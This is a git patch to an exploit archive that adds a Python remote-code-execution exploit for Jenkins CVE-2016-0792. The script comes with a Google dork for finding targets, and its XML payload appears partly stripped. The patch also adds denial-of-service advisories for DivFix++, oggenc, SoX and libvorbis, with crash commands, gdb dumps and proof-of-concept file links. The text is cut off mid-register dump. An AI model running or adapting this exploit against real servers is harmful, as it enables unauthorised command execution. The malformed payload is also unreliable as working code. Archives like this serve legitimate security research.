From c116e6f563e4f7cd6a0dab50954e7964630efc42 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 1 Aug 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-08-01 7 new exploits DivFix++ 0.34 - Denial of Service Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities libvorbis 1.3.5 - Multiple Vulnerabilities libao 1.2.0 - Denial of Service Jenkins < 1.650 - Java Deserialization DiskBoss Enterprise 8.2.14 - Buffer Overflow --- files.csv | 7 + platforms/java/remote/42394.py | 93 ++++++++++ platforms/linux/dos/42396.txt | 96 +++++++++++ platforms/linux/dos/42397.txt | 65 +++++++ platforms/linux/dos/42398.txt | 270 ++++++++++++++++++++++++++++++ platforms/linux/dos/42399.txt | 187 +++++++++++++++++++++ platforms/linux/dos/42400.txt | 62 +++++++ platforms/windows/remote/42395.py | 117 +++++++++++++ 8 files changed, 897 insertions(+) create mode 100755 platforms/java/remote/42394.py create mode 100755 platforms/linux/dos/42396.txt create mode 100755 platforms/linux/dos/42397.txt create mode 100755 platforms/linux/dos/42398.txt create mode 100755 platforms/linux/dos/42399.txt create mode 100755 platforms/linux/dos/42400.txt create mode 100755 platforms/windows/remote/42395.py diff --git a/files.csv b/files.csv index 9e2bcbeec..6213b7d10 100644 --- a/files.csv +++ b/files.csv @@ -5629,6 +5629,11 @@ id,file,description,date,author,platform,type,port 42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0 42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0 42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0 +42396,platforms/linux/dos/42396.txt,"DivFix++ 0.34 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0 +42397,platforms/linux/dos/42397.txt,"Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service",2017-07-31,qflb.wu,linux,dos,0 +42398,platforms/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0 +42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0 +42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15706,9 +15711,11 @@ id,file,description,date,author,platform,type,port 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0 +42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 +42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 diff --git a/platforms/java/remote/42394.py b/platforms/java/remote/42394.py new file mode 100755 index 000000000..00abf2e3d --- /dev/null +++ b/platforms/java/remote/42394.py @@ -0,0 +1,93 @@ +import random +import string +from decimal import Decimal + +import requests +from requests.exceptions import RequestException + +# Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit +# Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins" +# Date: 30-07-2017 +# Exploit Author: Janusz Piechówka +# Github: https://github.com/jpiechowka/jenkins-cve-2016-0792 +# Vendor Homepage: https://jenkins.io/ +# Version: Versions before 1.650 and LTS before 1.642.2 +# Tested on: Debian +# CVE : CVE-2016-0792 + + +def prepare_payload(command): + splitCommand = command.split() + preparedCommands = '' + + for entry in splitCommand: + preparedCommands += f'{entry}' + + xml = f''' + + + + + + hashCode + + + + {preparedCommands} + + start + + + + + 1 + + ''' + + return xml + + +def exploit(url, command): + print(f'[*] STARTING') + try: + print(f'[+] Trying to exploit Jenkins running at address: {url}') + # Perform initial URL check to see if server is online and returns correct response code using HEAD request + headResponse = requests.head(url, timeout=30) + if headResponse.status_code == requests.codes.ok: + print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}') + # Check if X-Jenkins header containing version is present then proceed + jenkinsVersionHeader = headResponse.headers.get('X-Jenkins') + if jenkinsVersionHeader is not None: + # Strip version after second dot from header to perform conversion to Decimal + stripCharacter = "." + strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2]) + # Perform basic version check + if Decimal(strippedVersion) < 1.650: + print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE') + # Prepare payload + payload = prepare_payload(command) + # Prepare POST url + randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8)) + if url.endswith('/'): + postUrl = f'{url}createItem?name={randomJobName}' + else: + postUrl = f'{url}/createItem?name={randomJobName}' + print(f'[+] Will POST to {postUrl}') + # Try to execute passed command + postResponse = requests.post(postUrl, data=payload, headers={'Content-Type': 'application/xml'}) + print(f'[+] Exploit launched ') + # 500 response code is ok here + print(f'[+] Response code: {postResponse.status_code} ') + if postResponse.status_code == 500: + print('[+] SUCCESS') + else: + print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED') + else: + print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable') + else: + print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}') + else: + print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}') + except RequestException as ex: + print(f'[-] [ERROR] Request exception: {ex}') + print('[*] FINISHED') diff --git a/platforms/linux/dos/42396.txt b/platforms/linux/dos/42396.txt new file mode 100755 index 000000000..97e02db4c --- /dev/null +++ b/platforms/linux/dos/42396.txt @@ -0,0 +1,96 @@ +DivFix++ denial of service vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +DivFix++ is FREE AVI Video Fix & Preview program. + + +Affected version: +===== +v0.34 + + +Vulnerability Description: +========================== +the DivFixppCore::avi_header_fix function in src/DivFix++Core.cpp in DivFix++ v0.34 can cause a denial of service(invalid memory write and application crash) via a crafted avi file. + + +./DivFix++ -i DivFix++_v0.34_invalid_memory_write.avi -o out.avi + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +__memcpy_sse2_unaligned () + at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167 +167../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. +(gdb) bt +#0 __memcpy_sse2_unaligned () + at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167 +#1 0x00000000004239d8 in DivFixppCore::avi_header_fix() () +#2 0x000000000042c0c0 in DivFixppCore::Fix(wxString, wxString, bool, bool, bool, bool) () +#3 0x000000000041404a in DivFixppApp::OnCmdLineParsed(wxCmdLineParser&) () +#4 0x0000000000414f6e in DivFixppApp::OnInit() () +#5 0x0000000000416f4f in wxAppConsoleBase::CallOnInit() () +#6 0x00007ffff6c6903c in wxEntry(int&, wchar_t**) () + from /usr/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0 +#7 0x0000000000411e70 in main () +(gdb) + + +------------------- +(gdb) disassemble 0x00000000004239b0,0x00000000004239df +Dump of assembler code from 0x4239b0 to 0x4239df: + 0x00000000004239b0 <_ZN12DivFixppCore14avi_header_fixEv+3504>:add %al,(%rax) + 0x00000000004239b2 <_ZN12DivFixppCore14avi_header_fixEv+3506>:mov %eax,%edi + 0x00000000004239b4 <_ZN12DivFixppCore14avi_header_fixEv+3508>:callq 0x434eaf <_Z17make_littleendianIiERT_S0_> + 0x00000000004239b9 <_ZN12DivFixppCore14avi_header_fixEv+3513>:mov -0x138(%rbp),%rdx + 0x00000000004239c0 <_ZN12DivFixppCore14avi_header_fixEv+3520>:mov 0x38(%rdx),%rdx + 0x00000000004239c4 <_ZN12DivFixppCore14avi_header_fixEv+3524>:lea 0x10(%rdx),%rcx + 0x00000000004239c8 <_ZN12DivFixppCore14avi_header_fixEv+3528>:mov $0x4,%edx + 0x00000000004239cd <_ZN12DivFixppCore14avi_header_fixEv+3533>:mov %rax,%rsi + 0x00000000004239d0 <_ZN12DivFixppCore14avi_header_fixEv+3536>:mov %rcx,%rdi +=> 0x00000000004239d3 <_ZN12DivFixppCore14avi_header_fixEv+3539>:callq 0x40fcc0 + 0x00000000004239d8 <_ZN12DivFixppCore14avi_header_fixEv+3544>:mov -0x138(%rbp),%rax +---Type to continue, or q to quit--- +End of assembler dump. +(gdb) i r +rax 0x6615286690088 +rbx 0x00 +rcx 0x1016 +rdx 0x44 +rsi 0x6615286690088 +rdi 0x1016 +rbp 0x7fffffffcf100x7fffffffcf10 +rsp 0x7fffffffcdd00x7fffffffcdd0 +r8 0x8049308407344 +r9 0x7ffff7fc1a40140737353882176 +r10 0x640000006e429496729710 +r11 0x00 +r12 0x11 +r13 0x11 +r14 0x00 +r15 0x00 +rip 0x4239d30x4239d3 +eflags 0x246[ PF ZF IF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit--- +gs 0x00 +(gdb) + + +POC: +DivFix++_v0.34_invalid_memory_write.avi +CVE: +CVE-2017-11330 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42396.zip diff --git a/platforms/linux/dos/42397.txt b/platforms/linux/dos/42397.txt new file mode 100755 index 000000000..aee7f044d --- /dev/null +++ b/platforms/linux/dos/42397.txt @@ -0,0 +1,65 @@ +vorbis-tools oggenc vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +The Vorbis Tools package contains command-line tools useful for encoding, playing or editing files using the Ogg CODEC. + + +Affected version: +===== +1.4.0 + + +Vulnerability Description: +========================== +the wav_open function in oggenc/audio.c in vorbis-tools 1.4.0 can cause a denial of service(memory allocation error) via a crafted wav file. + + +./oggenc vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav -o out + + +==68126==WARNING: AddressSanitizer failed to allocate 0xffffffffffffbc00 bytes +==68126==AddressSanitizer's allocator is terminating the process instead of returning 0 +==68126==If you don't like this behavior set allocator_may_return_null=1 +==68126==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:149 "((0)) != (0)" (0x0, 0x0) + #0 0x46d41f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x46d41f) + #1 0x472c81 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x472c81) + #2 0x4719c0 in __sanitizer::AllocatorReturnNull() (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4719c0) + #3 0x4674b6 in __interceptor_malloc (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4674b6) + #4 0x492896 in wav_open /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:573 + #5 0x496d8e in open_audio_file /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:86 + #6 0x485d0a in main /home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc.c:256 + #7 0x7f6d9f8dcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4) + #8 0x47d55c in _start (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x47d55c) + + + ----------------- +wav->channel_permute = malloc(wav->channels * sizeof(int)); +if (wav->channels <= 8) + /* Where we know the mappings, use them. */ + memcpy(wav->channel_permute, wav_permute_matrix[wav->channels-1], + sizeof(int) * wav->channels); +else + /* Use a default 1-1 mapping */ + for (i=0; i < wav->channels; i++) + wav->channel_permute[i] = i; + + +return 1; + + +Andthe code didn't check the return of malloc. + + +POC: +vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav +CVE: +CVE-2017-11331 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42397.zip diff --git a/platforms/linux/dos/42398.txt b/platforms/linux/dos/42398.txt new file mode 100755 index 000000000..0a4cd58c9 --- /dev/null +++ b/platforms/linux/dos/42398.txt @@ -0,0 +1,270 @@ +Sound eXchange (SoX) multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms. + + +Affected version: +===== +14.4.2 + + +Vulnerability Description: +========================== +1. +the startread function in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file. + + +./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg + + +----debug info:---- +Program received signal SIGFPE, Arithmetic exception. +0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950 +950 wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels; +(gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff +Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff: +=> 0x00007ffff7b9c829 :div %rcx + 0x00007ffff7b9c82c :mov %rax,0x0(%rbp) + 0x00007ffff7b9c830 :imul %rcx,%rax + 0x00007ffff7b9c834 :mov %rax,0x18(%rbx) + 0x00007ffff7b9c838 :mov 0x28(%rbp),%r8d + 0x00007ffff7b9c83c :test %r8d,%r8d + 0x00007ffff7b9c83f :je 0x7ffff7b9c849 + 0x00007ffff7b9c841 :movq $0x0,0x18(%rbx) + 0x00007ffff7b9c849 :mov %r9d,0x14(%rsp) + 0x00007ffff7b9c84e :mov %edi,0x10(%rsp) + 0x00007ffff7b9c852 :callq 0x7ffff7b50390 + 0x00007ffff7b9c857 :cmpw $0x1,0x22(%rsp) + 0x00007ffff7b9c85d :lea 0x241fa(%rip),%rdx # 0x7ffff7bc0a5e + 0x00007ffff7b9c864 :mov 0x10(%rsp),%edi + 0x00007ffff7b9c868 :mov 0x30(%rsp),%r8d + 0x00007ffff7b9c86d :lea 0x1de3a(%rip),%rcx # 0x7ffff7bba6ae + 0x00007ffff7b9c874 :mov %rdx,0x40(%rax) + 0x00007ffff7b9c878 :lea 0x115e7(%rip),%rax # 0x7ffff7bade66 +---Type to continue, or q to quit---q +End of assembler dump. +(gdb) i r +rax 0x5371335 +rbx 0x6115406362432 +rcx 0x00 +rdx 0x00 +rsi 0x88 +rdi 0x11 +rbp 0x611a600x611a60 +rsp 0x7fffffffdc000x7fffffffdc00 +r8 0x7ffff7fce7c0140737353934784 +r9 0x00 +r10 0x7fffffffd9c0140737488345536 +r11 0x7ffff72cca80140737340295808 +r12 0x5371335 +r13 0x7fffffffdc50140737488346192 +r14 0x7fffffffdc40140737488346176 +r15 0x00 +rip 0x7ffff7b9c8290x7ffff7b9c829 +eflags 0x10246[ PF ZF IF RF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +gs 0x00 +(gdb) + + +POC: +sox_14.4.2_divide_by_zero_error_1.wav +CVE: +CVE-2017-11332 + + +2. +the read_samples function in hcom.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted hcom file. + + +./sox sox_14.4.2_invalid_memory_read.hcom out.wav + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 +215 if(p->dictionary[p->dictentry].dict_leftson < 0) { +(gdb) bt +#0 read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 +#1 0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=, + len=8192) at formats.c:978 +#2 0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=, + max=) at sox.c:490 +#3 0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, + osamp=0x7fffffffdbb0) at sox.c:552 +#4 0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352 +#5 sox_flow_effects (chain=0x614260, + callback=callback@entry=0x405a80 , + client_data=client_data@entry=0x0) at effects.c:445 +#6 0x0000000000407bf6 in process () at sox.c:1802 +#7 0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008 +(gdb) disassemble +Dump of assembler code for function read_samples: + 0x00007ffff7b93900 <+0>:push %r15 + 0x00007ffff7b93902 <+2>:push %r14 + 0x00007ffff7b93904 <+4>:mov %rsi,%r14 + 0x00007ffff7b93907 <+7>:push %r13 + 0x00007ffff7b93909 <+9>:push %r12 + 0x00007ffff7b9390b <+11>:push %rbp + 0x00007ffff7b9390c <+12>:push %rbx + 0x00007ffff7b9390d <+13>:mov %rdi,%rbx + 0x00007ffff7b93910 <+16>:sub $0x28,%rsp + 0x00007ffff7b93914 <+20>:mov 0x2d0(%rdi),%r15 + 0x00007ffff7b9391b <+27>:mov 0x24(%r15),%esi + 0x00007ffff7b9391f <+31>:test %esi,%esi + 0x00007ffff7b93921 <+33>:js 0x7ffff7b93a60 + 0x00007ffff7b93927 <+39>:mov 0x10(%r15),%rdi + 0x00007ffff7b9392b <+43>:xor %eax,%eax + 0x00007ffff7b9392d <+45>:lea (%rax,%rdx,1),%r13d + 0x00007ffff7b93931 <+49>:lea 0x28(%r15),%rbp + 0x00007ffff7b93935 <+53>:mov %rdx,%r12 + 0x00007ffff7b93938 <+56>:lea 0x1(%r13),%eax + 0x00007ffff7b9393c <+60>:mov %eax,0xc(%rsp) + 0x00007ffff7b93940 <+64>:mov %r13d,%eax + 0x00007ffff7b93943 <+67>:mov %r12d,0x8(%rsp) +---Type to continue, or q to quit--- + 0x00007ffff7b93948 <+72>:sub %r12d,%eax + 0x00007ffff7b9394b <+75>:mov %eax,(%rsp) + 0x00007ffff7b9394e <+78>:jmp 0x7ffff7b93989 + 0x00007ffff7b93950 <+80>:lea -0x1(%rax),%r8d + 0x00007ffff7b93954 <+84>:movslq 0x20(%r15),%rax + 0x00007ffff7b93958 <+88>:mov 0x28(%r15),%edx + 0x00007ffff7b9395c <+92>:mov (%r15),%rsi + 0x00007ffff7b9395f <+95>:shl $0x4,%rax + 0x00007ffff7b93963 <+99>:test %edx,%edx + 0x00007ffff7b93965 <+101>:js 0x7ffff7b939e0 + 0x00007ffff7b93967 <+103>:movswq 0x8(%rsi,%rax,1),%rax + 0x00007ffff7b9396d <+109>:mov %eax,0x20(%r15) + 0x00007ffff7b93971 <+113>:shl $0x4,%rax + 0x00007ffff7b93975 <+117>:add %edx,%edx + 0x00007ffff7b93977 <+119>:mov %r8d,0x24(%r15) + 0x00007ffff7b9397b <+123>:add %rsi,%rax + 0x00007ffff7b9397e <+126>:mov %edx,0x28(%r15) +=> 0x00007ffff7b93982 <+130>:cmpw $0x0,0x8(%rax) + 0x00007ffff7b93987 <+135>:js 0x7ffff7b939f0 + 0x00007ffff7b93989 <+137>:test %rdi,%rdi + 0x00007ffff7b9398c <+140>:jle 0x7ffff7b93a48 + 0x00007ffff7b93992 <+146>:mov 0x24(%r15),%eax + 0x00007ffff7b93996 <+150>:test %eax,%eax +---Type to continue, or q to quit---q +Quit +(gdb) i r +rax 0x631b306495024 +rbx 0x6115906362512 +rcx 0x11 +rdx 0x6900006881280 +rsi 0x611b206363936 +rdi 0x5241316 +rbp 0x611ad80x611ad8 +rsp 0x7fffffffda300x7fffffffda30 +r8 0x1016 +r9 0x7ffff7fce7c0140737353934784 +r10 0x7fffffffd7f0140737488345072 +r11 0x7ffff72cb2e0140737340289760 +r12 0x1ff98185 +r13 0x20008192 +r14 0x61460c6374924 +r15 0x611ab06363824 +rip 0x7ffff7b939820x7ffff7b93982 +eflags 0x10206[ PF IF RF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit---q +Quit +(gdb) x/20x $rax+8 +0x631b38:Cannot access memory at address 0x631b38 +(gdb) + + +POC: +sox_14.4.2_invalid_memory_read.hcom +CVE: +CVE-2017-11358 + + +3. +the wavwritehdr function in wav.c in Sound eXchange(SoX) 14.4.2 allows remote attackers to cause a denial of service(divide-by-zero error and application crash) via a crafted snd file which convert to wav file. + + +./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav + + +----debug info:---- +Program received signal SIGFPE, Arithmetic exception. +0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, + second_header=second_header@entry=0) at wav.c:1457 +1457 blocksWritten = MS_UNSPEC/wBlockAlign; +(gdb) bt +#0 0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, + second_header=second_header@entry=0) at wav.c:1457 +#1 0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252 +#2 0x00007ffff7b59e32 in open_write ( + path=path@entry=0x611bc0 "/home/a/Documents/out.wav", + buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, + buffer_ptr=buffer_ptr@entry=0x0, + buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, + encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", + oob=oob@entry=0x7fffffffdcd0, + overwrite_permitted=overwrite_permitted@entry=0x409ce0 ) at formats.c:912 +#3 0x00007ffff7b5a5e8 in sox_open_write ( + path=path@entry=0x611bc0 "/home/a/Documents/out.wav", + signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, + filetype=, oob=oob@entry=0x7fffffffdcd0, + overwrite_permitted=overwrite_permitted@entry=0x409ce0 ) at formats.c:948 +#4 0x000000000040847a in open_output_file () at sox.c:1557 +#5 process () at sox.c:1754 +#6 0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008 +(gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff +Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff: +=> 0x00007ffff7b9a97b :idivl 0x10(%rsp) + 0x00007ffff7b9a97f :movslq %eax,%rcx + 0x00007ffff7b9a982 :imul %eax,%r12d + 0x00007ffff7b9a986 :mov %rcx,0x48(%rsp) + 0x00007ffff7b9a98b :imul %r14d,%eax + 0x00007ffff7b9a98f :cmp $0x31,%bp + 0x00007ffff7b9a993 :mov %eax,0x40(%rsp) + 0x00007ffff7b9a997 :je 0x7ffff7b9aff0 + 0x00007ffff7b9a99d :cmp $0x1,%bp + 0x00007ffff7b9a9a1 :je 0x7ffff7b9b0a8 + 0x00007ffff7b9a9a7 :movzwl 0x3e(%rsp),%eax + 0x00007ffff7b9a9ac :movl $0x0,0x34(%rsp) + 0x00007ffff7b9a9b4 :lea 0x12(%rax),%r13d + 0x00007ffff7b9a9b8 :mov %r12d,%eax + 0x00007ffff7b9a9bb :and $0x1,%eax + 0x00007ffff7b9a9be :movzwl %r13w,%r13d + 0x00007ffff7b9a9c2 :lea (%r12,%r13,1),%edx + 0x00007ffff7b9a9c6 :add %edx,%eax + 0x00007ffff7b9a9c8 :cmp $0x1,%bp + 0x00007ffff7b9a9cc :setne 0x3d(%rsp) +---Type to continue, or q to quit---q +Quit +(gdb) x/10gx $rsp+10 +0x7fffffffdaaa:0x00000000000000000x0056000000000000 +0x7fffffffdaba:0x00010000000000d40x0001000000000000 +0x7fffffffdaca:0x00000000000800000x0000000000000008 +0x7fffffffdada:0x0fe000007fff00000x876000007ffff7bc +0x7fffffffdaea:0x00d000007ffff7610x21a0000000000000 +(gdb) + + +POC: +sox_14.4.2_divide_by_zero_error_2.snd +CVE: +CVE-2017-11359 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42398.zip diff --git a/platforms/linux/dos/42399.txt b/platforms/linux/dos/42399.txt new file mode 100755 index 000000000..602fb877e --- /dev/null +++ b/platforms/linux/dos/42399.txt @@ -0,0 +1,187 @@ +libvorbis multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +The libvorbis package contains a general purpose audio and music encoding format. This is useful for creating (encoding) and playing (decoding) sound in an open (patent free) format. + + +Affected version: +===== +1.3.5 + + +Vulnerability Description: +========================== +1. +the vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(OOM) via a crafted wav file. + + +I found this bug when I test Sound eXchange(SoX) 14.4.2 which used the libvorbis library. + + +./sox libvorbis_1.3.5_OOM.wav out.ogg + + +/var/log/syslog info: + Jul 13 19:58:05 ubuntu kernel: [] Out of memory: Kill process 44203 (sox) score 364 or sacrifice child +Jul 13 19:58:05 ubuntu kernel: [] Killed process 44203 (sox) total-vm:1831804kB, anon-rss:599932kB, file-rss:40kB + + +----debug info:---- +#0 0x00007ffff5df5e92 in vorbis_analysis_wrote () +from /usr/local/lib/libvorbis.so.0 +#1 0x00007ffff7ba1cba in write_samples (ft=0x611c20, buf=buf@entry=0x0, + len=len@entry=0x0) at vorbis.c:358 +#2 0x00007ffff7ba1dc5 in stopwrite (ft=) at vorbis.c:398 +#3 0x00007ffff7b58488 in sox_close (ft=0x611c20) at formats.c:1006 +#4 0x0000000000405fa8 in cleanup () at sox.c:246 +#5 0x0000000000403479 in main (argc=argc@entry=0x3, + argv=argv@entry=0x7fffffffe5e8) at sox.c:3050 +#6 0x00007ffff727bec5 in __libc_start_main (main=0x4029c0
, argc=0x3, + argv=0x7fffffffe5e8, init=, fini=, + rtld_fini=, stack_end=0x7fffffffe5d8) at libc-start.c:287 +#7 0x0000000000403c65 in _start () +-------- +Program terminated with signal SIGKILL, Killed. +The program no longer exists. + + +POC: +libvorbis_1.3.5_OOM.wav +CVE: +CVE-2017-11333 + + +2. +the vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(NULL pointer dereference and application crash) via a crafted ogg file. + + +I found this bug when I test mp3splt 2.6.2 which used the libvorbis library. + + +./mp3splt -P -t 0.9 libvorbis_1.3.5_null_pointer_dereference.ogg + + +----debug info:---- +0x00007ffff61752c0 in vorbis_block_clear () from /usr/local/lib/libvorbis.so.0 +(gdb) disassemble +Dump of assembler code for function vorbis_block_clear: + 0x00007ffff61752a0 <+0>:push %r14 + 0x00007ffff61752a2 <+2>:mov %rdi,%r14 + 0x00007ffff61752a5 <+5>:push %r13 + 0x00007ffff61752a7 <+7>:push %r12 + 0x00007ffff61752a9 <+9>:push %rbp + 0x00007ffff61752aa <+10>:push %rbx + 0x00007ffff61752ab <+11>:mov 0xb8(%rdi),%r13 + 0x00007ffff61752b2 <+18>:callq 0x7ffff616b240 <_vorbis_block_ripcord@plt> + 0x00007ffff61752b7 <+23>:mov 0x70(%r14),%rdi + 0x00007ffff61752bb <+27>:test %rdi,%rdi + 0x00007ffff61752be <+30>:je 0x7ffff61752c5 +=> 0x00007ffff61752c0 <+32>:callq 0x7ffff616b130 + 0x00007ffff61752c5 <+37>:test %r13,%r13 + 0x00007ffff61752c8 <+40>:je 0x7ffff617530c + 0x00007ffff61752ca <+42>:mov $0x1,%r12d + 0x00007ffff61752d0 <+48>:xor %ebx,%ebx + 0x00007ffff61752d2 <+50>:jmp 0x7ffff61752df + 0x00007ffff61752d4 <+52>:nopl 0x0(%rax) + 0x00007ffff61752d8 <+56>:add $0x1,%ebx + 0x00007ffff61752db <+59>:add $0x1,%r12d + 0x00007ffff61752df <+63>:movslq %ebx,%rax +---Type to continue, or q to quit---q +Quit +(gdb) i r +rax 0x22 +rbx 0x61fca06421664 +rcx 0x00 +rdx 0x7ffff7ba6778140737349576568 +rsi 0x00 +rdi 0x80128 +rbp 0x7fffffffd4700x7fffffffd470 +rsp 0x7fffffffd4000x7fffffffd400 +r8 0x746e656d75636f008389754676633104128 +r9 0x6143506374224 +r10 0x7fffffffd1f0140737488343536 +r11 0x7ffff61752a0140737322111648 +r12 0x6128506367312 +r13 0x00 +r14 0x6205606423904 +r15 0x7ffff7bcf146140737349742918 +rip 